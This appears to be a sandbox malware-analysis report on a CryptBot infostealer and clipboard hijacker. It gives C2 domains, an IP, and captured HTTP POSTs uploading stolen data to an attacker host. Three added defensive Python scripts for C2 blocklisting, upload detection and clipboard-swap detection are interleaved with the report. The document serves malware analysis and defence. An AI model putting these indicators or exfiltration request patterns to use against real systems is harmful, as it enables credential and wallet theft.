Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1522675
MD5: fb481c39ea41b8bd7743bf3a9d730e76
SHA1: 57fb93e92efa53e80fb196d5fbb3717783c54809
SHA256: ec23c516e7dcc1783530369419e6ce7333a228f4e5209216d70e8489048e3ab4
Tags: exeuser-4k95m

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of creating screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: Set-up.exe.4816.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["upload.phps.top", "s.top", "@twelvevx12vs.top", "+twelvevx12vs.top", "LRPCtwelvevx12vs.top", "twelvevx12vs.top", "analforeverlovyu.top"]}
Source: https://serviceupdate32.com/update Virustotal: Detection: 17%
Source: Set-up.exe ReversingLabs: Detection: 28%
Source: Set-up.exe Virustotal: Detection: 35%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_000115B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_000115B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 5_2_6C3414B0
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 5_2_000181E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BAEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C360860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C36A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C36A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C36A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C41F960h 5_2_6C35EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C364453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C3E84A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C36C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C36A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C36A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 5_2_6C36A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C36E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C36E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 5_2_6C3E0730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C360740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BC040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BC1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 5_2_6C39A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 5_2_6C360260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C41D014h] 5_2_6C414360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BBD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 5_2_6C3B7D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C3B3840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 5_2_6C36D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C399B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C37BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C37BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C3BB4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 5_2_6C36D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_6C3B9600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 5_2_6C36D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C41DFF4h 5_2_6C3B3690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 5_2_6C36D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 5_2_6C3E3140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C35B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 5_2_6C36D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 5_2_6C3D7350

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49704 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49706 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49712 -> 84.38.182.221:80
Source: Malware configuration extractor URLs: upload.phps.top
Source: Malware configuration extractor URLs: s.top
Source: Malware configuration extractor URLs: @twelvevx12vs.top
Source: Malware configuration extractor URLs: +twelvevx12vs.top
Source: Malware configuration extractor URLs: LRPCtwelvevx12vs.top
Source: Malware configuration extractor URLs: twelvevx12vs.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
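The extractor output above contains entries that are not real hostnames ("s.top", "@twelvevx12vs.top", "+twelvevx12vs.top", "LRPCtwelvevx12vs.top"): a config extractor that carves strings out of memory routinely picks up adjacent bytes, and pushing such entries straight into a DNS blocklist would be wrong. The script below is an added example, not part of the Joe Sandbox report or of any extractor; it normalizes each candidate, checks DNS-name syntax, and uses the hosts actually observed in the capture (the DNS query and HTTP Host header, both twelvevx12vs.top) to separate real hosts from glued-prefix variants and truncated fragments. The candidate and observed lists are copied from this report; the verdict labels are this script's own.

```python
import re
from typing import Dict, Iterable, List, Optional, Set

# Candidate C2 hosts as emitted by the sandbox's config extractor for this
# sample (copied from the report). "s.top" and the prefixed variants are the
# over-matches this script is meant to separate from real hosts.
EXTRACTED_C2 = [
    "upload.phps.top", "s.top", "@twelvevx12vs.top", "+twelvevx12vs.top",
    "LRPCtwelvevx12vs.top", "twelvevx12vs.top", "analforeverlovyu.top",
]
# Hosts corroborated by the sandbox network capture (DNS query, HTTP Host header).
OBSERVED_HOSTS = {"twelvevx12vs.top"}

_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def normalize(candidate: str) -> Optional[str]:
    """Lowercase and strip leading bytes that cannot start a DNS name
    ("@", "+", ...). Returns None when what remains is not a valid name."""
    host = re.sub(r"^[^a-z0-9]+", "", candidate.strip().lower())
    labels = host.split(".")
    if len(labels) < 2 or not all(_LABEL.match(label) for label in labels):
        return None
    return host


def _glued_tail(longer: str, shorter: str) -> bool:
    """True when `shorter` is the tail of `longer` with no label boundary in
    front of it: the extra bytes are glued onto a label (LRPCtwelvevx12vs.top)
    rather than forming a subdomain (upload.twelvevx12vs.top would be one)."""
    return (longer != shorter and longer.endswith(shorter)
            and longer[-len(shorter) - 1] != ".")


def triage(extracted: Iterable[str], observed: Set[str]) -> Dict[str, str]:
    """Map each raw extractor entry to a verdict string."""
    norm = {raw: normalize(raw) for raw in extracted}
    valid = sorted({h for h in norm.values() if h})
    verdicts: Dict[str, str] = {}
    for raw, host in norm.items():
        if host is None:
            verdicts[raw] = "invalid"
        elif host in observed:
            verdicts[raw] = "confirmed"
        elif (bases := [h for h in observed if _glued_tail(host, h)]):
            # Junk bytes in front of a host that was actually seen on the wire.
            verdicts[raw] = f"glued-prefix variant of {max(bases, key=len)}"
        elif (longer := [h for h in valid if _glued_tail(h, host)]):
            # Syntactically valid, but only the tail of another entry.
            verdicts[raw] = f"truncated fragment of {min(longer, key=len)}"
        else:
            verdicts[raw] = "unverified"
    return verdicts


def blocklist(extracted: Iterable[str], observed: Set[str]) -> List[str]:
    """Hosts worth blocking: confirmed ones plus clean, unverified ones.
    Fragments and glued variants are dropped so a false "s.top" entry
    never reaches a DNS sinkhole."""
    verdicts = triage(extracted, observed)
    return sorted({normalize(raw) for raw, v in verdicts.items()
                   if v in ("confirmed", "unverified")})


if __name__ == "__main__":
    for raw, verdict in triage(EXTRACTED_C2, OBSERVED_HOSTS).items():
        print(f"{raw:25} -> {verdict}")
    print("blocklist:", blocklist(EXTRACTED_C2, OBSERVED_HOSTS))
```

The "unverified" tier (upload.phps.top, analforeverlovyu.top) is syntactically clean but was never contacted during the run; treat those as lower-confidence indicators and confirm them against passive DNS before blocking on them.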
Source: Joe Sandbox View IP Address: 84.38.182.221 84.38.182.221
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
Source: global traffic HTTP traffic detected:
  POST /v1/upload.php HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=----Boundary41476359
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Content-Length: 412
  Host: twelvevx12vs.top
Source: global traffic HTTP traffic detected:
  POST /v1/upload.php HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=----Boundary68176922
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Content-Length: 75959
  Host: twelvevx12vs.top
Source: global traffic HTTP traffic detected:
  POST /v1/upload.php HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=----Boundary70233283
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Content-Length: 30029
  Host: twelvevx12vs.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: twelvevx12vs.top
Source: unknown HTTP traffic detected:
  POST /v1/upload.php HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Content-Type: multipart/form-data; boundary=----Boundary41476359
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  Content-Length: 412
  Host: twelvevx12vs.top
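The three POSTs above share a shape that is easy to write a detection for: a multipart upload to /v1/upload.php, a boundary of the literal "----Boundary" plus eight digits, and a Chrome User-Agent with none of the Accept headers a real Chrome form submission carries (the report shows winhttp.dll and webio.dll loaded by Set-up.exe, consistent with a WinHTTP client faking a browser UA). The script below is an added example, not part of the report and not the ET Suricata rule 2054350 cited above, whose content this page does not show; it parses raw request heads and applies a three-signal heuristic. The two malicious requests are copied from the report (headers re-joined with CRLF, bodies omitted); the benign form post is constructed as a control.

```python
import re
from typing import Dict, List, Tuple

# Two of the three POSTs captured in this report (headers re-joined with
# CRLF; bodies omitted) plus one constructed benign browser form post that
# must not match.
SAMPLE_REQUESTS = [
    "POST /v1/upload.php HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    "Content-Type: multipart/form-data; boundary=----Boundary41476359\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\n"
    "Content-Length: 412\r\nHost: twelvevx12vs.top\r\n\r\n",
    "POST /v1/upload.php HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\n"
    "Content-Type: multipart/form-data; boundary=----Boundary68176922\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\n"
    "Content-Length: 75959\r\nHost: twelvevx12vs.top\r\n\r\n",
    # Constructed control: the headers a real Chrome form submission carries.
    "POST /account/login HTTP/1.1\r\n"
    "Host: www.example.com\r\nConnection: keep-alive\r\nContent-Length: 48\r\n"
    "Origin: https://www.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\r\n"
    "Accept: text/html,application/xhtml+xml\r\nReferer: https://www.example.com/\r\n"
    "Accept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n",
]

# The sample's boundary: literal "----Boundary" followed by eight digits.
# Browsers generate "----WebKitFormBoundary<16 alnum>" or similar instead.
_BOUNDARY = re.compile(r"boundary=----Boundary\d{8}$")
# Headers Chrome always sends on a form POST; a WinHTTP client only sends
# them if its author adds them explicitly.
_BROWSER_HEADERS = ("accept", "accept-encoding", "accept-language")


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split an HTTP/1.1 request head into (method, path, {lowercased name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def match_cryptbot_upload(raw: str) -> Tuple[bool, List[str]]:
    """Heuristic for the upload pattern in this report. All three signals
    must fire; each one alone is common in benign traffic."""
    method, path, h = parse_request(raw)
    reasons: List[str] = []
    if method == "POST" and path.endswith("/upload.php"):
        reasons.append("POST to */upload.php")
    if _BOUNDARY.search(h.get("content-type", "")):
        reasons.append("multipart boundary '----Boundary' + 8 digits")
    if "Chrome/" in h.get("user-agent", "") and not any(x in h for x in _BROWSER_HEADERS):
        reasons.append("Chrome User-Agent without Accept/Accept-Encoding/Accept-Language")
    return len(reasons) == 3, reasons


def triage(requests: List[str]) -> List[Tuple[str, int, bool]]:
    """(Host, Content-Length, matched) per request; the size column lets an
    analyst tell a small beacon from a bulk upload."""
    out = []
    for raw in requests:
        _, _, h = parse_request(raw)
        matched, _ = match_cryptbot_upload(raw)
        out.append((h.get("host", ""), int(h.get("content-length", "0")), matched))
    return out


if __name__ == "__main__":
    for host, length, matched in triage(SAMPLE_REQUESTS):
        print(f"{host:20} {length:>7} bytes  {'MATCH' if matched else 'ok'}")
```

The Content-Length column is worth keeping in any alert: a 412-byte POST followed by 75959- and 30029-byte POSTs to the same path is the shape of a check-in followed by bulk uploads, which matches the Malpedia description of the stolen data being zipped and sent to the C2.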
Source: Set-up.exe, Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2185018616.0000000001978000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/?
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/G
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001968000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/O
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/d
Source: Set-up.exe, 00000000.00000003.2425407959.0000000001968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevx12vs.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: UwGCIJbIlmBudMOlckMv.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.2195396401.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C359C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_6C359C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C359D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_6C359D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C359E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_6C359E27
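The two call chains above are the whole clipboard-hijacker loop: 5_2_6C359C22 sleeps, polls GetClipboardSequenceNumber and, when the sequence number changes, writes a new value (EmptyClipboard, SetClipboardData); 5_2_6C359E27 reads the current contents (GetClipboardData). The script below is an added example, not from the report or from the sample, showing how an API-monitor trace of that shape can be turned into a behavioral verdict: poll loop plus a write that replaces a wallet-looking string the process just read with a different wallet-looking string. The traces and wallet addresses are constructed; the report does not show the sample's actual clipboard contents or the addresses it substitutes, and the address regexes are illustrative shapes for Ethereum and Bitcoin, not a validation of any real address.

```python
import re
from typing import List, Tuple

# Constructed API trace in the shape a sandbox or API monitor emits:
# (api, argument-or-return-value). Addresses are made up, not from the sample.
VICTIM_ADDR = "0x" + "ab" * 20
ATTACKER_ADDR = "0x" + "cd" * 20
HIJACKER_TRACE = [
    ("Sleep", "100"), ("GetClipboardSequenceNumber", "41"),   # nothing changed yet
    ("Sleep", "100"), ("GetClipboardSequenceNumber", "42"),   # user copied something
    ("OpenClipboard", ""), ("GetClipboardData", VICTIM_ADDR),
    ("GlobalLock", ""), ("GlobalUnlock", ""), ("CloseClipboard", ""),
    ("OpenClipboard", ""), ("GlobalAlloc", ""), ("GlobalLock", ""),
    ("strcpy", ATTACKER_ADDR), ("GlobalUnlock", ""), ("EmptyClipboard", ""),
    ("SetClipboardData", ATTACKER_ADDR), ("CloseClipboard", ""),
]
# Constructed control: a clipboard manager re-setting what the user copied.
MANAGER_TRACE = [
    ("OpenClipboard", ""), ("GetClipboardData", "meeting notes"), ("CloseClipboard", ""),
    ("OpenClipboard", ""), ("EmptyClipboard", ""), ("SetClipboardData", "meeting notes"),
    ("CloseClipboard", ""),
]

# Illustrative wallet-address shapes: Ethereum (0x + 40 hex), Bitcoin legacy
# base58 (starts 1 or 3) and bech32 (starts bc1). Shapes only, no checksums.
WALLET = re.compile(
    r"^(0x[0-9a-fA-F]{40}|[13][1-9A-HJ-NP-Za-km-z]{25,34}|bc1[02-9ac-hj-np-z]{11,71})$")


def find_clipboard_swaps(trace: List[Tuple[str, str]]) -> List[Tuple[int, str, str]]:
    """[(index, read_value, written_value)] for every SetClipboardData that
    replaces a wallet-looking string the process just read with a different
    wallet-looking string."""
    last_read = None
    swaps: List[Tuple[int, str, str]] = []
    for i, (api, arg) in enumerate(trace):
        if api == "GetClipboardData":
            last_read = arg
        elif api == "SetClipboardData" and last_read is not None:
            if arg != last_read and WALLET.match(last_read) and WALLET.match(arg):
                swaps.append((i, last_read, arg))
    return swaps


def poll_iterations(trace: List[Tuple[str, str]]) -> int:
    """Count Sleep -> GetClipboardSequenceNumber pairs, i.e. the polling loop
    the report's 5_2_6C359C22 chain starts with."""
    return sum(1 for (a, _), (b, _) in zip(trace, trace[1:])
               if a == "Sleep" and b == "GetClipboardSequenceNumber")


def is_clipboard_hijacker(trace: List[Tuple[str, str]]) -> bool:
    """Polling plus at least one address swap; either alone is not enough
    (clipboard managers poll, password managers write)."""
    return poll_iterations(trace) >= 1 and bool(find_clipboard_swaps(trace))


if __name__ == "__main__":
    for name, trace in (("hijacker", HIJACKER_TRACE), ("manager", MANAGER_TRACE)):
        print(name, "polls:", poll_iterations(trace),
              "swaps:", find_clipboard_swaps(trace),
              "verdict:", is_clipboard_hijacker(trace))
```

Requiring both the poll loop and a differing wallet-shaped write is what keeps legitimate clipboard tools out of the alert; a detection built on SetClipboardData alone, or on OpenClipboard frequency alone, will fire on them constantly.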

System Summary

Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr 314617856
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_000151B0 5_2_000151B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00013E20 5_2_00013E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C382CCE 5_2_6C382CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C34CD00 5_2_6C34CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C34EE50 5_2_6C34EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C350FC0 5_2_6C350FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C390AC0 5_2_6C390AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3544F0 5_2_6C3544F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3846E0 5_2_6C3846E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3807D0 5_2_6C3807D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3787C0 5_2_6C3787C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C390060 5_2_6C390060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C382090 5_2_6C382090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C372360 5_2_6C372360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C39DC70 5_2_6C39DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C355880 5_2_6C355880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3798F0 5_2_6C3798F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C387A20 5_2_6C387A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38DBEE 5_2_6C38DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38140E 5_2_6C38140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C391510 5_2_6C391510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38F610 5_2_6C38F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C36F760 5_2_6C36F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C343000 5_2_6C343000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C4050D0 5_2_6C4050D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3570C0 5_2_6C3570C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C40ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C413820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C4136E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C413B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C415A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C413560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C415980 appears 83 times
